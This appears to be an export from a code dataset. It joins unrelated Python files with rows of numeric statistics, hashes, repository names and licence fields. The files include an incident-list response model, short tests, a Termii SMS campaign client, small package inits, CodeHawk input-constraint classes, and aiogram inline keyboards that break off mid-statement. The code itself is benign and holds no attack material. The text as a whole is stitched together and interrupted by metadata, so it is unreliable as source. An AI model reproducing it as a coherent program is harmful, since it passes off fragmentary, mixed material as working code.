"incidents": incidents,
}
)
if pagination_meta is not UNSET:
field_dict["pagination_meta"] = pagination_meta
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
incidents = []
_incidents = d.pop("incidents")
for incidents_item_data in _incidents:
incidents_item = IncidentResponseBody.from_dict(incidents_item_data)
incidents.append(incidents_item)
_pagination_meta = d.pop("pagination_meta", UNSET)
pagination_meta: Union[Unset, PaginationMetaResponseBody]
if isinstance(_pagination_meta, Unset):
pagination_meta = UNSET
else:
pagination_meta = PaginationMetaResponseBody.from_dict(_pagination_meta)
incidents_list_response_body = cls(
incidents=incidents,
pagination_meta=pagination_meta,
)
incidents_list_response_body.additional_properties = d
return incidents_list_response_body
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
| 98.502427
| 124
| 0.640342
| 4,311
| 40,583
| 5.847135
| 0.049177
| 0.283255
| 0.051573
| 0.154719
| 0.947475
| 0.936327
| 0.927441
| 0.927441
| 0.927441
| 0.92268
| 0
| 0.127549
| 0.18185
| 40,583
| 411
| 125
| 98.742092
| 0.63163
| 0.901387
| 0
| 0.066667
| 0
| 0
| 0.027591
| 0.009321
| 0
| 0
| 0
| 0
| 0
| 1
| 0.116667
| false
| 0
| 0.083333
| 0.05
| 0.35
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e8a4eddbe3c546ac1c73d612e5405b4d9bd45a2f
| 172
|
py
|
Python
|
tests/test_myapp/test_dependencies_container.py
|
BasicWolf/hexagonal-architecture-django
|
3bfa4ea2f258ba038c6e3cf73bcdae0511b6fcb6
|
[
"MIT"
] | 15
|
2021-05-31T12:56:53.000Z
|
2022-02-06T11:44:40.000Z
|
tests/test_myapp/test_dependencies_container.py
|
BasicWolf/hexagonal-architecture-django
|
3bfa4ea2f258ba038c6e3cf73bcdae0511b6fcb6
|
[
"MIT"
] | 6
|
2021-06-08T17:29:47.000Z
|
2022-03-30T09:41:06.000Z
|
tests/test_myapp/test_dependencies_container.py
|
BasicWolf/hexagonal-architecture-django
|
3bfa4ea2f258ba038c6e3cf73bcdae0511b6fcb6
|
[
"MIT"
] | 6
|
2021-06-07T08:26:24.000Z
|
2022-02-28T11:06:49.000Z
|
from myapp.dependencies_container import build_production_dependencies_container
def test_build_production_ioc_container():
build_production_dependencies_container()
| 28.666667
| 80
| 0.889535
| 19
| 172
| 7.473684
| 0.526316
| 0.443662
| 0.380282
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075581
| 172
| 5
| 81
| 34.4
| 0.893082
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
e8adcf4424a85e0f2dd1d251e004f64638689e3a
| 46
|
py
|
Python
|
test.py
|
bichanna/coolPrint
|
44df057fdf4349fcc8346da250841b78758cb995
|
[
"MIT"
] | 3
|
2021-08-31T18:03:24.000Z
|
2021-11-15T11:54:30.000Z
|
test.py
|
bichanna/coolprint
|
44df057fdf4349fcc8346da250841b78758cb995
|
[
"MIT"
] | null | null | null |
test.py
|
bichanna/coolprint
|
44df057fdf4349fcc8346da250841b78758cb995
|
[
"MIT"
] | null | null | null |
import coolprint
coolprint.coolprint("Hello")
| 15.333333
| 28
| 0.826087
| 5
| 46
| 7.6
| 0.6
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 3
| 28
| 15.333333
| 0.883721
| 0
| 0
| 0
| 0
| 0
| 0.106383
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 1
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
e8b533c16757d9c155bac848ab273c2cf77549ec
| 5,059
|
py
|
Python
|
pytermii/campaign.py
|
Adeshinadev/pytermii
|
29d38eeb1da03885ffab13738b3729f95038311d
|
[
"MIT"
] | 1
|
2022-03-17T10:51:07.000Z
|
2022-03-17T10:51:07.000Z
|
pytermii/campaign.py
|
Adeshinadev/pytermii
|
29d38eeb1da03885ffab13738b3729f95038311d
|
[
"MIT"
] | null | null | null |
pytermii/campaign.py
|
Adeshinadev/pytermii
|
29d38eeb1da03885ffab13738b3729f95038311d
|
[
"MIT"
] | null | null | null |
import json
import requests
from pytermii.phonebook import Phonebook
base_url = 'https://api.ng.termii.com/api'
class Campaign:
def __init__(self, api_key):
self.api_key = api_key
def send_campaign_by_name(self, phonebook_name, country_code, sender_id, message, channel, message_type,
campaign_type,
schedule_sms_status=None, schedule_time=None):
phonebooks = Phonebook(self.api_key)
all_phonebooks = phonebooks.fetch()
phonebook_id = 'id'
if phonebook_name:
for i in all_phonebooks['data']:
if i['name'] == phonebook_name:
phonebook_id = i['id']
else:
pass
if schedule_time and schedule_sms_status:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
"schedule_time": schedule_time,
"schedule_sms_status": schedule_sms_status
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
else:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
else:
message = {'message': 'please provide a value for phonebook_name'}
return json.dumps(message)
def send_campaign_by_id(self, phonebook_id, country_code, sender_id, message, channel, message_type,
campaign_type,
schedule_sms_status=None, schedule_time=None):
if schedule_time and schedule_sms_status:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
"schedule_time": schedule_time,
"schedule_sms_status": schedule_sms_status
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
else:
payload = {
"api_key": self.api_key,
"country_code": country_code,
"sender_id": sender_id,
"message": message,
"channel": channel,
"message_type": message_type,
"phonebook_id": phonebook_id,
"delimiter": ",",
"remove_duplicate": "yes",
"campaign_type": campaign_type,
}
headers = {
'Content-Type': 'application/json',
}
url = base_url + f'/sms/campaigns/send'
response = requests.post(url, headers=headers, json=payload)
return response.json()
def fetch_campaign(self):
url = base_url + f'/sms/campaigns?api_key={self.api_key}'
response = requests.get(url)
print(response.json())
return response.json()
def fetch_campaigns(self):
url = base_url + f'/sms/campaigns?api_key={self.api_key}'
response = requests.get(url)
print(response.json())
return response.json()
def fetch_campaign_history(self, campaign_id):
url = base_url + f'/sms/campaigns/{campaign_id}?api_key={self.api_key}'
response = requests.get(url)
print(response.json())
return response.json()
| 37.198529
| 108
| 0.504645
| 469
| 5,059
| 5.172708
| 0.140725
| 0.044518
| 0.04122
| 0.042869
| 0.813685
| 0.80709
| 0.787716
| 0.787716
| 0.787716
| 0.787716
| 0
| 0
| 0.396521
| 5,059
| 135
| 109
| 37.474074
| 0.794628
| 0
| 0
| 0.741667
| 0
| 0
| 0.177611
| 0.024723
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0.008333
| 0.025
| 0
| 0.15
| 0.025
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8b572d3a5593251770ed37593be08db716c8c57
| 176
|
py
|
Python
|
scierror/__init__.py
|
segFault15/PyError
|
95a87dd8a885cbcc814a4ebad39b507788947141
|
[
"MIT"
] | 2
|
2021-05-01T01:44:17.000Z
|
2021-05-10T12:20:14.000Z
|
scierror/__init__.py
|
segFault15/PyError
|
95a87dd8a885cbcc814a4ebad39b507788947141
|
[
"MIT"
] | 3
|
2020-09-23T11:27:29.000Z
|
2021-05-05T01:07:55.000Z
|
scierror/__init__.py
|
segFault15/scierror
|
95a87dd8a885cbcc814a4ebad39b507788947141
|
[
"MIT"
] | null | null | null |
from scierror.main import Measurement
from scierror.main import LinearRegression
from scierror.main import DataFile
from scierror.main import latex_table
__version__ = '0.0.3'
| 29.333333
| 42
| 0.840909
| 25
| 176
| 5.72
| 0.48
| 0.335664
| 0.447552
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019108
| 0.107955
| 176
| 6
| 43
| 29.333333
| 0.89172
| 0
| 0
| 0
| 0
| 0
| 0.028249
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.8
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
fa2e302b4508900667e3acb9899bfa8921b28412
| 114
|
py
|
Python
|
tortoise/log.py
|
blazing-gig/tortoise-orm
|
811bbcb12c702c5f45e3d86ce6e0b2ab386459df
|
[
"Apache-2.0"
] | 2,847
|
2018-08-27T12:02:21.000Z
|
2022-03-31T01:30:40.000Z
|
tortoise/log.py
|
blazing-gig/tortoise-orm
|
811bbcb12c702c5f45e3d86ce6e0b2ab386459df
|
[
"Apache-2.0"
] | 983
|
2018-08-24T16:42:41.000Z
|
2022-03-30T05:14:49.000Z
|
tortoise/log.py
|
blazing-gig/tortoise-orm
|
811bbcb12c702c5f45e3d86ce6e0b2ab386459df
|
[
"Apache-2.0"
] | 323
|
2018-09-04T23:38:42.000Z
|
2022-03-31T06:49:17.000Z
|
import logging
logger = logging.getLogger("tortoise")
db_client_logger = logging.getLogger("tortoise.db_client")
| 22.8
| 58
| 0.807018
| 14
| 114
| 6.357143
| 0.5
| 0.292135
| 0.494382
| 0.674157
| 0.853933
| 0.853933
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 114
| 4
| 59
| 28.5
| 0.847619
| 0
| 0
| 0
| 0
| 0
| 0.22807
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
3af93b3bf0d738c0d08924627a59aaf80cd653e5
| 9,519
|
py
|
Python
|
chb/invariants/InputConstraint.py
|
kestreltechnology/CodeHawk-Binary
|
aa0b2534e0318e5fb3770ec7b4d78feb0feb2394
|
[
"MIT"
] | null | null | null |
chb/invariants/InputConstraint.py
|
kestreltechnology/CodeHawk-Binary
|
aa0b2534e0318e5fb3770ec7b4d78feb0feb2394
|
[
"MIT"
] | null | null | null |
chb/invariants/InputConstraint.py
|
kestreltechnology/CodeHawk-Binary
|
aa0b2534e0318e5fb3770ec7b4d78feb0feb2394
|
[
"MIT"
] | null | null | null |
# ------------------------------------------------------------------------------
# CodeHawk Binary Analyzer
# Author: Henny Sipma
# ------------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2016-2020 Kestrel Technology LLC
# Copyright (c) 2020 Henny Sipma
# Copyright (c) 2021 Aarno Labs LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ------------------------------------------------------------------------------
from abc import ABC, abstractmethod
from typing import Optional, TYPE_CHECKING
import chb.invariants.InputConstraintValue as ICV
import chb.util.fileutil as UF
if TYPE_CHECKING:
import chb.invariants.XXpr
class InputConstraint(ABC):
def __init__(self) -> None:
pass
def is_env_test(self) -> bool:
return False
def is_env_absent(self) -> bool:
return False
def is_string_starts_with(self) -> bool:
return False
def is_string_not_starts_with(self) -> bool:
return False
def is_string_equals(self) -> bool:
return False
def is_string_not_equals(self) -> bool:
return False
def is_string_contains(self) -> bool:
return False
def is_string_not_contains(self) -> bool:
return False
@property
@abstractmethod
def stringexpr(self) -> ICV.InputConstraintValue:
...
class EnvironmentTestConstraint(InputConstraint):
def __init__(self, name: str):
InputConstraint.__init__(self)
self._name = name
@property
def name(self) -> str:
return self._name
@property
def stringexpr(self) -> ICV.InputConstraintValue:
raise UF.CHBError("Environment constraint has not stringexpr")
def is_env_test(self) -> bool:
return True
def __str__(self) -> str:
return "env(" + self.name + ")"
class EnvironmentAbsentConstraint(InputConstraint):
def __init__(self, name: str):
InputConstraint.__init__(self)
self._name = name
@property
def name(self) -> str:
return self._name
@property
def stringexpr(self) -> ICV.InputConstraintValue:
raise UF.CHBError("Environment constraint has not stringexpr")
def is_env_absent(self) -> bool:
return True
def __str__(self) -> str:
return "!env(" + self.name + ")"
class StringEqualsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
def is_string_equals(self) -> bool:
return True
def __str__(self) -> str:
predicate = "equalsIgnoreCase" if self.case_insensitive else "equals"
return (predicate
+ "("
+ str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
class StringNotEqualsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
def is_string_not_equals(self) -> bool:
return True
def __str__(self) -> str:
predicate = "equalsIgnoreCase" if self.case_insensitive else "equals"
return ("!"
+ predicate
+ "("
+ str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
class StringStartsWithConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
length: Optional[int] = None,
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self._length = length
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
@property
def length(self) -> int:
if self._length is not None:
return self._length
else:
raise UF.CHBError("String constraint has no length: "
+ str(self))
def has_length(self) -> bool:
return self._length is not None
def is_string_starts_with(self) -> bool:
return True
def __str__(self) -> str:
predicate = "startswithIgnoreCase" if self.case_insensitive else "startswith"
return (predicate
+ '(' +
str(self.stringexpr)
+ ','
+ str(self.stringconst)
+ ')')
class StringNotStartsWithConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: "chb.invariants.XXpr.XXpr",
length: Optional[int] = None,
case_insensitive: bool = False) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
self._length = length
self.case_insensitive = case_insensitive
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> "chb.invariants.XXpr.XXpr":
return self._stringconst
@property
def length(self) -> int:
if self._length is not None:
return self._length
else:
raise UF.CHBError("String constraint has no length: "
+ str(self))
def has_length(self) -> bool:
return self._length is not None
def is_string_not_starts_with(self) -> bool:
return True
def __str__(self) -> str:
predicate = "startswithIgnoreCase" if self.case_insensitive else "startswith"
return ("!"
+ predicate
+ "(" +
str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
class StringContainsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: str) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> str:
return self._stringconst
def is_string_contains(self) -> bool:
return True
def __str__(self) -> str:
return ("contains("
+ str(self.stringexpr)
+ ','
+ self.stringconst
+ ')')
class StringNotContainsConstraint(InputConstraint):
def __init__(
self,
stringexpr: ICV.InputConstraintValue,
stringconst: str) -> None:
InputConstraint.__init__(self)
self._stringexpr = stringexpr
self._stringconst = stringconst
@property
def stringexpr(self) -> ICV.InputConstraintValue:
return self._stringexpr
@property
def stringconst(self) -> str:
return self._stringconst
def is_string_not_contains(self) -> bool:
return True
def __str__(self) -> str:
return ("!contains("
+ str(self.stringexpr)
+ ","
+ str(self.stringconst)
+ ")")
| 28.5
| 85
| 0.602794
| 939
| 9,519
| 5.899894
| 0.179979
| 0.06065
| 0.045487
| 0.032491
| 0.752347
| 0.733032
| 0.728881
| 0.714982
| 0.688448
| 0.672924
| 0
| 0.002364
| 0.288896
| 9,519
| 333
| 86
| 28.585586
| 0.816073
| 0.151907
| 0
| 0.886463
| 0
| 0
| 0.061164
| 0.023869
| 0
| 0
| 0
| 0
| 0
| 1
| 0.235808
| false
| 0.004367
| 0.021834
| 0.157205
| 0.480349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
d75715918a5e94bb00fed3635dd9586199908ef3
| 23,487
|
py
|
Python
|
app/keyboards/inline/add_product_photo.py
|
Katel212/MyPersonalKitchenBot
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
[
"MIT"
] | null | null | null |
app/keyboards/inline/add_product_photo.py
|
Katel212/MyPersonalKitchenBot
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
[
"MIT"
] | 5
|
2020-12-22T17:53:05.000Z
|
2021-04-07T20:00:47.000Z
|
app/keyboards/inline/add_product_photo.py
|
Katel212/MyPersonalKitchenBot
|
03de0beeaf2665e8b3ddd1709da3d4edcd422b80
|
[
"MIT"
] | null | null | null |
from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton, inline_keyboard
class AddProductPhotoErrorFridge(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'fridge\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoGoodFridge(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'fridge\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 3:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
class AddProductPhotoErrorShoppingList(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'shopping_list\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoGoodShoppingList(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'shopping_list\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) >= 3:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'shopping_list\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
class AddProductPhotoCheckErrorFridge(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'fridge\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoCheckErrorShoplist(InlineKeyboardMarkup):
@staticmethod
def create():
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'shopping_list\']')
add_typing_button = InlineKeyboardButton('Ввести вручную', callback_data=f'add_product_typing_[\'shopping_list\']')
return InlineKeyboardMarkup(inline_keyboard=[[reset_button, add_typing_button]])
class AddProductPhotoCheckGoodFridge(InlineKeyboardMarkup):
@staticmethod
def create(foods: list):
reset_button = InlineKeyboardButton('Повторить', callback_data=f'add_product_photo_check_[\'fridge\']')
add_typing_button = InlineKeyboardButton('Ввести вручную',
callback_data=f'add_product_typing_[\'fridge\']')
inline_kb_full = InlineKeyboardMarkup(row_width=1)
if len(foods) == 1:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
inline_kb_full.add(product_one)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 2:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
inline_kb_full.add(product_one, product_two)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 3:
product_one = InlineKeyboardButton(foods[0], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2], callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
inline_kb_full.add(product_one, product_two, product_three)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 4:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 5:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.add(product_five)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 6:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[4]}')
product_six = InlineKeyboardButton(foods[5],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[5]}')
inline_kb_full = InlineKeyboardMarkup(row_width=2)
inline_kb_full.row(product_one, product_two)
inline_kb_full.row(product_three, product_four)
inline_kb_full.row(product_five, product_six)
inline_kb_full.row(reset_button, add_typing_button)
return inline_kb_full
if len(foods) == 7:
product_one = InlineKeyboardButton(foods[0],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[0]}')
product_two = InlineKeyboardButton(foods[1],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[1]}')
product_three = InlineKeyboardButton(foods[2],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[2]}')
product_four = InlineKeyboardButton(foods[3],
callback_data=f'add_product_photo_name_ok_[\'fridge\']+{foods[3]}')
product_five = InlineKeyboardButton(foods[4],
